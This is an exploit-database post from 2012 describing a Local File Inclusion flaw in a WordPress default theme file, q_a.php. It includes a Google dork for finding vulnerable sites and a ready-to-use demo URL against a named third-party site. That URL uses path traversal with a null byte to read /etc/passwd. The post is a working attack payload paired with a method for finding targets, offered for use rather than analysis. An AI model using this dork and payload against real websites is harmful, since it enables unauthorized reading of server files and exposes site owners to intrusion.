Home / exploits WordPress Default Local File Inclusion
Posted on 30 November 2012
# Exploit Title: Wordpress default Local File Inclusion Vulnerability # # Google Dork: inurl:/wp-content/themes/default/q_a.php?lang= # # Date: 2012-30-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : MEdium # # Category: Web Application # =================================== =================================== # Location: http://site/wp-content/themes/default/q_a.php?lang=[Directory or file] # # Demo : http://www.club126.com/wp-content/themes/default/q_a.php?lang=/etc/passwd%00 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================
